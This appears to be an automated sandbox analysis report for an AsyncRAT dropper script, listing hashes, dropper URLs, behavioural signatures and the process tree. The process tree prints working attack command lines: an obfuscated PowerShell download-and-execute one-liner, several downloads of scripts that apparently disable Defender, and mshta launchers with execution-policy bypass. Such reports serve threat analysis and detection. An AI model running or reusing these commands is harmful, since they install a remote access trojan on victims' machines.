asyncrat | 32696fdc1973162602638cdec277dde152bf855ee4be61a47258fd7b09354b65

Analysis

max time kernel
150s
max time network
152s
platform
windows10_x64
resource
win10v20210410
submitted
04-05-2021 07:02

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

GK58.vbs
Size

436B
MD5

a3f4ec37e400752adb85a34e63560be8
SHA1

b20367d00c0bd8ed3f9df0838c237267b7694a84
SHA256

32696fdc1973162602638cdec277dde152bf855ee4be61a47258fd7b09354b65
SHA512

93f0b8cb8d08d03510f5a4ccf7470bf3620df2da8f7e77cc4790cefbae461ee9ff5fb3b4961adf40061264e1032e09165078d433f3d4805f9a9f419f8ea8b1a1

Score

10^/10

asyncrat rat

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://teammagical.com/3.txt

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://lax007.hawkhost.com/~mazennet/t-ool/11.txt

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://lax007.hawkhost.com/~mazennet/t-ool/Defender.bat

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://lax007.hawkhost.com/~mazennet/t-ool/DefenderKill.lnk

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://lax007.hawkhost.com/~mazennet/t-ool/Kill.txt

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://lax007.hawkhost.com/~mazennet/def/GoogleUpdate.bat

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://teammagical.com/2.txt

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://lax007.hawkhost.com/~mazennet/def/Dicord.lnk

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers.
rat asyncrat

Async RAT payload 2 IoCs

rat

Processes:

resource	yara_rule
behavioral2/memory/3520-251-0x000000000040D0AE-mapping.dmp	asyncrat
behavioral2/memory/2156-260-0x000000000040D0AE-mapping.dmp	asyncrat

Blocklisted process makes network request 10 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

flow	pid	process
9	504	powershell.exe
19	504	powershell.exe
21	504	powershell.exe
23	1056	powershell.exe
24	3404	powershell.exe
25	3640	powershell.exe
26	2116	powershell.exe
27	3900	powershell.exe
28	2424	powershell.exe
29	2588	powershell.exe

Suspicious use of SetThreadContext 2 IoCs

Processes:

powershell.exepowershell.exe

description	pid	process	target process
PID 1208 set thread context of 3520	1208	powershell.exe	MSBuild.exe
PID 3444 set thread context of 2156	3444	powershell.exe	MSBuild.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Modifies registry class 1 IoCs

Processes:

powershell.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings powershell.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings	powershell.exe

Suspicious behavior: EnumeratesProcesses 40 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exeMSBuild.exe

pid	process
504	powershell.exe
504	powershell.exe
504	powershell.exe
2332	powershell.exe
2332	powershell.exe
2332	powershell.exe
1056	powershell.exe
1056	powershell.exe
1056	powershell.exe
3404	powershell.exe
3404	powershell.exe
3404	powershell.exe
3640	powershell.exe
3640	powershell.exe
3640	powershell.exe
2116	powershell.exe
2116	powershell.exe
2116	powershell.exe
3652	powershell.exe
3652	powershell.exe
3652	powershell.exe
4036	powershell.exe
4036	powershell.exe
4036	powershell.exe
3900	powershell.exe
3900	powershell.exe
3900	powershell.exe
2424	powershell.exe
2424	powershell.exe
2424	powershell.exe
2588	powershell.exe
2588	powershell.exe
2588	powershell.exe
1208	powershell.exe
1208	powershell.exe
1208	powershell.exe
3444	powershell.exe
3444	powershell.exe
3444	powershell.exe
3520	MSBuild.exe

Suspicious use of AdjustPrivilegeToken 56 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exeMSBuild.exe

description	pid	process
Token: SeDebugPrivilege	504	powershell.exe
Token: SeDebugPrivilege	2332	powershell.exe
Token: SeDebugPrivilege	1056	powershell.exe
Token: SeDebugPrivilege	3404	powershell.exe
Token: SeDebugPrivilege	3640	powershell.exe
Token: SeDebugPrivilege	2116	powershell.exe
Token: SeDebugPrivilege	3652	powershell.exe
Token: SeDebugPrivilege	4036	powershell.exe
Token: SeIncreaseQuotaPrivilege	4036	powershell.exe
Token: SeSecurityPrivilege	4036	powershell.exe
Token: SeTakeOwnershipPrivilege	4036	powershell.exe
Token: SeLoadDriverPrivilege	4036	powershell.exe
Token: SeSystemProfilePrivilege	4036	powershell.exe
Token: SeSystemtimePrivilege	4036	powershell.exe
Token: SeProfSingleProcessPrivilege	4036	powershell.exe
Token: SeIncBasePriorityPrivilege	4036	powershell.exe
Token: SeCreatePagefilePrivilege	4036	powershell.exe
Token: SeBackupPrivilege	4036	powershell.exe
Token: SeRestorePrivilege	4036	powershell.exe
Token: SeShutdownPrivilege	4036	powershell.exe
Token: SeDebugPrivilege	4036	powershell.exe
Token: SeSystemEnvironmentPrivilege	4036	powershell.exe
Token: SeRemoteShutdownPrivilege	4036	powershell.exe
Token: SeUndockPrivilege	4036	powershell.exe
Token: SeManageVolumePrivilege	4036	powershell.exe
Token: 33	4036	powershell.exe
Token: 34	4036	powershell.exe
Token: 35	4036	powershell.exe
Token: 36	4036	powershell.exe
Token: SeIncreaseQuotaPrivilege	4036	powershell.exe
Token: SeSecurityPrivilege	4036	powershell.exe
Token: SeTakeOwnershipPrivilege	4036	powershell.exe
Token: SeLoadDriverPrivilege	4036	powershell.exe
Token: SeSystemProfilePrivilege	4036	powershell.exe
Token: SeSystemtimePrivilege	4036	powershell.exe
Token: SeProfSingleProcessPrivilege	4036	powershell.exe
Token: SeIncBasePriorityPrivilege	4036	powershell.exe
Token: SeCreatePagefilePrivilege	4036	powershell.exe
Token: SeBackupPrivilege	4036	powershell.exe
Token: SeRestorePrivilege	4036	powershell.exe
Token: SeShutdownPrivilege	4036	powershell.exe
Token: SeDebugPrivilege	4036	powershell.exe
Token: SeSystemEnvironmentPrivilege	4036	powershell.exe
Token: SeRemoteShutdownPrivilege	4036	powershell.exe
Token: SeUndockPrivilege	4036	powershell.exe
Token: SeManageVolumePrivilege	4036	powershell.exe
Token: 33	4036	powershell.exe
Token: 34	4036	powershell.exe
Token: 35	4036	powershell.exe
Token: 36	4036	powershell.exe
Token: SeDebugPrivilege	3900	powershell.exe
Token: SeDebugPrivilege	2424	powershell.exe
Token: SeDebugPrivilege	2588	powershell.exe
Token: SeDebugPrivilege	1208	powershell.exe
Token: SeDebugPrivilege	3444	powershell.exe
Token: SeDebugPrivilege	3520	MSBuild.exe

Suspicious use of WriteProcessMemory 62 IoCs

Processes:

WScript.exepowershell.exeWScript.exepowershell.exepowershell.execmd.exemshta.execmd.exemshta.exepowershell.execmd.exemshta.exepowershell.exeMSBuild.execmd.exe

description	pid	process	target process
PID 3896 wrote to memory of 504	3896	WScript.exe	powershell.exe
PID 3896 wrote to memory of 504	3896	WScript.exe	powershell.exe
PID 504 wrote to memory of 1212	504	powershell.exe	WScript.exe
PID 504 wrote to memory of 1212	504	powershell.exe	WScript.exe
PID 1212 wrote to memory of 2332	1212	WScript.exe	powershell.exe
PID 1212 wrote to memory of 2332	1212	WScript.exe	powershell.exe
PID 2332 wrote to memory of 1056	2332	powershell.exe	powershell.exe
PID 2332 wrote to memory of 1056	2332	powershell.exe	powershell.exe
PID 2332 wrote to memory of 3404	2332	powershell.exe	powershell.exe
PID 2332 wrote to memory of 3404	2332	powershell.exe	powershell.exe
PID 2332 wrote to memory of 3640	2332	powershell.exe	powershell.exe
PID 2332 wrote to memory of 3640	2332	powershell.exe	powershell.exe
PID 2332 wrote to memory of 2116	2332	powershell.exe	powershell.exe
PID 2332 wrote to memory of 2116	2332	powershell.exe	powershell.exe
PID 2332 wrote to memory of 3652	2332	powershell.exe	powershell.exe
PID 2332 wrote to memory of 3652	2332	powershell.exe	powershell.exe
PID 3652 wrote to memory of 2280	3652	powershell.exe	cmd.exe
PID 3652 wrote to memory of 2280	3652	powershell.exe	cmd.exe
PID 2280 wrote to memory of 2268	2280	cmd.exe	mshta.exe
PID 2280 wrote to memory of 2268	2280	cmd.exe	mshta.exe
PID 2268 wrote to memory of 4036	2268	mshta.exe	powershell.exe
PID 2268 wrote to memory of 4036	2268	mshta.exe	powershell.exe
PID 504 wrote to memory of 3900	504	powershell.exe	powershell.exe
PID 504 wrote to memory of 3900	504	powershell.exe	powershell.exe
PID 504 wrote to memory of 2424	504	powershell.exe	powershell.exe
PID 504 wrote to memory of 2424	504	powershell.exe	powershell.exe
PID 504 wrote to memory of 2588	504	powershell.exe	powershell.exe
PID 504 wrote to memory of 2588	504	powershell.exe	powershell.exe
PID 504 wrote to memory of 2228	504	powershell.exe	cmd.exe
PID 504 wrote to memory of 2228	504	powershell.exe	cmd.exe
PID 2228 wrote to memory of 936	2228	cmd.exe	mshta.exe
PID 2228 wrote to memory of 936	2228	cmd.exe	mshta.exe
PID 936 wrote to memory of 1208	936	mshta.exe	powershell.exe
PID 936 wrote to memory of 1208	936	mshta.exe	powershell.exe
PID 1208 wrote to memory of 3520	1208	powershell.exe	MSBuild.exe
PID 1208 wrote to memory of 3520	1208	powershell.exe	MSBuild.exe
PID 1208 wrote to memory of 3520	1208	powershell.exe	MSBuild.exe
PID 1208 wrote to memory of 3520	1208	powershell.exe	MSBuild.exe
PID 1208 wrote to memory of 3520	1208	powershell.exe	MSBuild.exe
PID 1208 wrote to memory of 3520	1208	powershell.exe	MSBuild.exe
PID 1208 wrote to memory of 3520	1208	powershell.exe	MSBuild.exe
PID 1208 wrote to memory of 3520	1208	powershell.exe	MSBuild.exe
PID 504 wrote to memory of 716	504	powershell.exe	cmd.exe
PID 504 wrote to memory of 716	504	powershell.exe	cmd.exe
PID 716 wrote to memory of 4056	716	cmd.exe	mshta.exe
PID 716 wrote to memory of 4056	716	cmd.exe	mshta.exe
PID 4056 wrote to memory of 3444	4056	mshta.exe	powershell.exe
PID 4056 wrote to memory of 3444	4056	mshta.exe	powershell.exe
PID 3444 wrote to memory of 2156	3444	powershell.exe	MSBuild.exe
PID 3444 wrote to memory of 2156	3444	powershell.exe	MSBuild.exe
PID 3444 wrote to memory of 2156	3444	powershell.exe	MSBuild.exe
PID 3444 wrote to memory of 2156	3444	powershell.exe	MSBuild.exe
PID 3444 wrote to memory of 2156	3444	powershell.exe	MSBuild.exe
PID 3444 wrote to memory of 2156	3444	powershell.exe	MSBuild.exe
PID 3444 wrote to memory of 2156	3444	powershell.exe	MSBuild.exe
PID 3444 wrote to memory of 2156	3444	powershell.exe	MSBuild.exe
PID 3520 wrote to memory of 1928	3520	MSBuild.exe	cmd.exe
PID 3520 wrote to memory of 1928	3520	MSBuild.exe	cmd.exe
PID 3520 wrote to memory of 1928	3520	MSBuild.exe	cmd.exe
PID 1928 wrote to memory of 2788	1928	cmd.exe	powershell.exe
PID 1928 wrote to memory of 2788	1928	cmd.exe	powershell.exe
PID 1928 wrote to memory of 2788	1928	cmd.exe	powershell.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\GK58.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:3896

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $A='DowRing'.Replace('R','nloadstr');$B = 'WebCAMt'.Replace('AM','lien');$d='tnt'.Replace('tn','Ne');$link ='https://teammagical.com/3.txt';$t1='(New-OS'.Replace('S','bje');$t2='ct Sypek)'.Replace('pe','stem.$d.$B).$A($lin');$WC=I`E`X ($t1,$t2 -Join '')|I`E`X
2⤵
- Blocklisted process makes network request
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:504

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Public\ss.vbs"
3⤵
- Suspicious use of WriteProcessMemory
PID:1212

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File C:\Users\Public\11.ps1
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2332

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "& { (New-Object Net.WebClient).DownloadFile('https://lax007.hawkhost.com/~mazennet/t-ool/11.txt', 'C:\Users\Public\11.ps1') }"
5⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1056

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "& { (New-Object Net.WebClient).DownloadFile('https://lax007.hawkhost.com/~mazennet/t-ool/Defender.bat', 'C:\Users\Public\Defender.bat') }"
5⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3404

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "& { (New-Object Net.WebClient).DownloadFile('https://lax007.hawkhost.com/~mazennet/t-ool/DefenderKill.lnk', 'C:\Users\Public\DefenderKill.lnk') }"
5⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3640

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "& { (New-Object Net.WebClient).DownloadFile('https://lax007.hawkhost.com/~mazennet/t-ool/Kill.txt', 'C:\Users\Public\Kill.ps1') }"
5⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2116

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File C:\Users\Public\Kill.ps1
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3652

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Defender.bat" "
6⤵
- Suspicious use of WriteProcessMemory
PID:2280

C:\Windows\system32\mshta.exe
mshta vbscript:Execute("CreateObject(""WScript.Shell"").Run ""powershell -ExecutionPolicy Bypass & 'C:\Users\Public\11.ps1'"", 0:close")
7⤵
- Suspicious use of WriteProcessMemory
PID:2268

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass & 'C:\Users\Public\11.ps1'
8⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4036

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "& { (New-Object Net.WebClient).DownloadFile('https://lax007.hawkhost.com/~mazennet/def/GoogleUpdate.bat', 'C:\Users\Public\GoogleUpdate.bat') }"
3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3900

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "& { (New-Object Net.WebClient).DownloadFile('https://teammagical.com/2.txt', 'C:\Users\Public\msi.ps1') }"
3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2424

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "& { (New-Object Net.WebClient).DownloadFile('https://lax007.hawkhost.com/~mazennet/def/Dicord.lnk', 'C:\ProgramData\Microsoft Arts\Start\Dicord.lnk') }"
3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2588

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Public\GoogleUpdate.bat" "
3⤵
- Suspicious use of WriteProcessMemory
PID:2228

C:\Windows\system32\mshta.exe
mshta vbscript:Execute("CreateObject(StrReverse(""llehS.tpircSW"")).Run ""powershell -ExecutionPolicy Bypass & 'C:\Users\Public\msi.ps1'"", 0:close")
4⤵
- Suspicious use of WriteProcessMemory
PID:936

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass & 'C:\Users\Public\msi.ps1'
5⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1208

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
#cmd
6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3520

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c start /b powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\lwqpan.exe"' & exit
7⤵
- Suspicious use of WriteProcessMemory
PID:1928

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\lwqpan.exe"'
8⤵
PID:2788

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Public\GoogleUpdate.bat" "
3⤵
- Suspicious use of WriteProcessMemory
PID:716

C:\Windows\system32\mshta.exe
mshta vbscript:Execute("CreateObject(StrReverse(""llehS.tpircSW"")).Run ""powershell -ExecutionPolicy Bypass & 'C:\Users\Public\msi.ps1'"", 0:close")
4⤵
- Suspicious use of WriteProcessMemory
PID:4056

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass & 'C:\Users\Public\msi.ps1'
5⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3444

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
#cmd
6⤵
PID:2156

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Microsoft Arts\Start\Dicord.lnk
MD5
ce592d7b323596c62e25c58305fbd1f1

SHA1
a582b2c867d054bfc436ac04aa8b626a6e7c886b

SHA256
8cf9b48967283e8d15012c6f9438280841bb94baf499a91647922f28eab37619

SHA512
0b5640a2261fbb5bcdb60dee6b6178b2c451cce411d8b8791c8d6dc09e1b01a0e80d605a6e4e119453f349e4ee62340e9a3bed70dadb16a8b2fd4592facd3335

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
MD5
42d4b1d78e6e092af15c7aef34e5cf45

SHA1
6cf9d0e674430680f67260194d3185667a2bb77b

SHA256
c4089b4313f7b8b74956faa2c4e15b9ffb1d9e5e29ac7e00a20c48b8f7aef5e0

SHA512
d31f065208766eea61facc91b23babb4c94906fb564dc06d114cbbc4068516f94032c764c188bed492509010c5dbe61f096d3e986e0ae3e70a170a9986458930

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
3f6deb5f12ada6498f2086da644042d8

SHA1
9b964d573b2c9285de158c8447997e248fa214e6

SHA256
24fc33824d8e26511510639d667c5d9634aad5f1c3e52d19583677ecfae14193

SHA512
3ee40baa706f5a9a380792b3c3ac9d8000363aaf6130fc4aae4b8c63d456c844f5d98bd006c7d6758f9720073eef075e1338002ea7edb4b2e2df5665c3e18c15

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
d4d659594303c78b27eb2d31f1bceafe

SHA1
07b038e7e603631442309848bf6f8dafaa5f648c

SHA256
6ed0baea7e698fdb7420311e47ac0540fde32a1e6b9b72cfcab3ae02685f2b9a

SHA512
92b504d36487bb0beecd45718f44893baed90b12c5b072610cb4422de576b154e7efe87f94f1aeb413c835ad1f264cb84111986efec9e6743e965489c45f7559

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
bd2e2ad3cd2489ef53c3c79d368c5556

SHA1
5c6c0f64159c328326b4fe1062b512c5fd54db1a

SHA256
9937ece36bc2a0476a55e1bdb640b52435d55ebab953cf0ced5e9c1ec058871c

SHA512
508bde641af8feb6d2ea64497d200d2bc2cd5a75d930f03f1561775f6651f4ba50455e80cd8b4e5b9f7d57deb3fd0a6e509cad04313797e2c7427f2cba7fe4ae

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
e5e9ad70c0bc121aa3730fab7439aec5

SHA1
958968cedc8d14f0e5eea9f40ec439d31220db3c

SHA256
d17c9425e8963ec6a33ce0d9553f5a544f20d9ff8f06ab5b6bba03ca28afcbac

SHA512
5f85fbe8c18330a8761455a75c9fd32fbccee42d06b4bee9f68119691e635e1da62714d61242ca8c891541f539ad5b48f99b1cdf484b2513f01ab3cfe5c0cc8d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
50ee9a530c24f2745794058f29b76734

SHA1
ef86557a41284983b461e652c0e7e536fd405f62

SHA256
614ec362d17473f6da1c68366786f91db1fdc5de641064b64a37c62cd6f90b0a

SHA512
ac9005af4d1d0f76b983a72fb1659eceb6fad41339c1220cb43f1b4748fe32531a9fd562e1213f3056551c32745572bf8be55b23b6d15dc6973368650a2cdfce

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
50ee9a530c24f2745794058f29b76734

SHA1
ef86557a41284983b461e652c0e7e536fd405f62

SHA256
614ec362d17473f6da1c68366786f91db1fdc5de641064b64a37c62cd6f90b0a

SHA512
ac9005af4d1d0f76b983a72fb1659eceb6fad41339c1220cb43f1b4748fe32531a9fd562e1213f3056551c32745572bf8be55b23b6d15dc6973368650a2cdfce

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
72750f57b4c7954e396c11ee0d6409bf

SHA1
cc269209a281ae3f53f280427216594398866b7d

SHA256
9ebfba9103c7eb08f7018e1d839c5fa0769b2a5358e017cba505108e0af51dcd

SHA512
875cd768107160fbfc5eb19e762e14e9f3514534db18537bae12c97712f34e7c8ba2211da119b0e199e78a5c2c325d78ab9cc7fd72fdb6d6ebc115cff03caf46

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
611a5dbf9506bf1a681dbb868c49978b

SHA1
a7ac3477cfb598bc42c4a2765423c5f17ed86a6b

SHA256
73019f96bb5bbf338d35f827d838d31146f8bc53850a127ca84b9c8d5359d05c

SHA512
e80eb25f8a9befb842fb11a1f78a9bf689de137cf50db15c25fb108dfa8e3951bed6e57326601c8dba89436aaefd7212882a94fa2f8ab252debe03920aa69671

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
551970cda127b949e75fe115a47d6828

SHA1
2250f1878b130eb3cbd8c931c66a2aa73fe6fa21

SHA256
5460c122c22e3e07088475c18f8c587c09485280c8425398193859c0c6161e92

SHA512
b499fa38758c506eb3828ce94a017481b6b8098cffdb5f1dbe361358de12727f36cc112e629f254a4248bb7089e2d1d0fe9222f07a1f829b51b1b8ecb0072284

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
a3cdf14c234a82463756d6a296192659

SHA1
c67e6f133ee9a90a70172f33168f5f067d86c284

SHA256
65ec910c3740aaaf98e00778b61a1c0c57ab88297f884dfa6bc097aaebcaffe7

SHA512
f9a7de0aa2e04e3179461b23cde7d0e0e6c08c3e02711fc7eeb68277e51cc6adf8dcb4c761a8f1625ac7621fd72c165681eece1ea6e7b7fd20eb12507c4c7cc1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
2f31d2fc1c21a243dcd9a392d422e189

SHA1
4fc60ec0442416c1b059831f5f2b7fcc7b8fff2f

SHA256
e449da3d5f55884577676079acad821f2127cf0126c137c15e0f135f1084296b

SHA512
8c519f428bc39e27db576a90c9ed419385731bc74708b1bb8f385056322625d386f3e5668b5fac149e1cac5eca8f2d66a68a42ff377ffd374be5c155fc5f0f4d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
2f31d2fc1c21a243dcd9a392d422e189

SHA1
4fc60ec0442416c1b059831f5f2b7fcc7b8fff2f

SHA256
e449da3d5f55884577676079acad821f2127cf0126c137c15e0f135f1084296b

SHA512
8c519f428bc39e27db576a90c9ed419385731bc74708b1bb8f385056322625d386f3e5668b5fac149e1cac5eca8f2d66a68a42ff377ffd374be5c155fc5f0f4d

Download Submit
C:\Users\Public\11.ps1
MD5
d4c2856e8c22e984a62bcc8b3fcdc505

SHA1
ff4087c7806d0828bb4cf2bd57b0b546108d6fc6

SHA256
f0f9e51900e859546085bdab2088ac0e652ffc044eff8cf02e2108c8c0cdfad7

SHA512
c918680f97aac540c4f7e01e158115bec0ed52e39b6cc4176dbdb287ea5f15316d0b0a81fc5abc350fd8cc53ad29d346c121e1073825b23a92fbb130b834f89f

Download Submit
C:\Users\Public\11.ps1
MD5
f9671f50a3701099915249be9c9b519e

SHA1
c383a79653700507edf01c494f2a7ac664963711

SHA256
987b88896b23da2d57371bf1709019bee218ee72fb9a88f9afda88427570c448

SHA512
d21f67cee9d3fe56541beaab90c28335f9122abb1942a209ba6634f5f14fa75f8d43a3e0c4a11d2009a964200d06836df8245264c0922b8c46adff68d2293a41

Download Submit
C:\Users\Public\Defender.bat
MD5
bb81dd50c01d78e9359b7d8f2b99f93e

SHA1
35ecd940870508d659866d43351ebd11920b98b8

SHA256
fa94673156394c814fdab9b634ad6e327cc7e0f6cf5412f31d74103a3a6e3931

SHA512
3c29815e29a65e14f0202ddd9c83eda367535651f87332be39acfe2d0c51536cc224281b7c794f1b67a3528c293fdf76a7142b5d1c1c734ab35c664fa657f90f

Download Submit
C:\Users\Public\DefenderKill.lnk
MD5
d50605593740da71810d0dedf04281e0

SHA1
b672961b731400d653039fedcd7dfa71cc3e0179

SHA256
56ec901d7efadda7a2868abc7ff458d8177660361e5572a4806a232e46846464

SHA512
190a98490786fbdf8b189ea10697b7a6acebdaf0dcda11d7d6fde8c1df72af2fd4c5d0b2874d812e20307d609d25af354ff74ce2fd564a563b84912975f46b05

Download Submit
C:\Users\Public\GoogleUpdate.bat
MD5
311524c0e72f5c65f62bf73ffb57ee3c

SHA1
c917cb67fac476be24cd73eddafd21c7da79af15

SHA256
62da5d7a78b42aeed845e30f7360e42adb2cf77365386295ebc549d9ce0d4daa

SHA512
2d46fdb99392f85a47e1bf465f8948d1af139fda4176b3f058ad9f079a781a2167a2e7480883517cb01cb2bb675bd7dcb5f285cd957439c9119c5407fd209411

Download Submit
C:\Users\Public\Kill.ps1
MD5
2e1021023713f80d3d233d4a9467e6b2

SHA1
94ae0dd1fccbed177d354e39e99737293900b28a

SHA256
d532e0ef22db774861c441769b16edfc9df1e055423fcda74230d774ce09370a

SHA512
e9599bb5fc8766cf259dab6eaf7802f3be9a0a7da347cf93e8616d4239ef37a7d7eecb9f48d46498f4f6522cb2aa6bd2897bd8a7476c86913dc8247ddf8ace7f

Download Submit
C:\Users\Public\msi.ps1
MD5
717253ddd4be3f31c331aeae1d35bc6f

SHA1
d2e410397417485313ca94529b06adcdfa898492

SHA256
0baccf1a972f6209942a43fbd789de4574d9876001eee01e73fd6690a32fdcc0

SHA512
e5fe32177dfce5bfece3ad64594e2f3cb0456ee65e999b10c79e25ef662d8f95f395d575fa03ee41c799a1656d25acedae1664b6161257634c7a69623a956b25

Download Submit
C:\Users\Public\ss.vbs
MD5
98f69749329ccb2ee8d69288e04f2332

SHA1
3a8477b107a52cd0b96961d0666cf07ae5045d76

SHA256
771780d15b72c2d35c069cf0e7e53346f14ea6078609e7be090b5249bd040556

SHA512
372e0766f7ca026893720b42de5d34ef667723a0519210977c9ea5af275e6c82dfa3743b69e5cfeba529f9f90e1ca51644b20cfc63f9996a5450cd3da10244cf

Download Submit
memory/504-121-0x000001376D1D3000-0x000001376D1D5000-memory.dmp

Filesize
8KB

Download
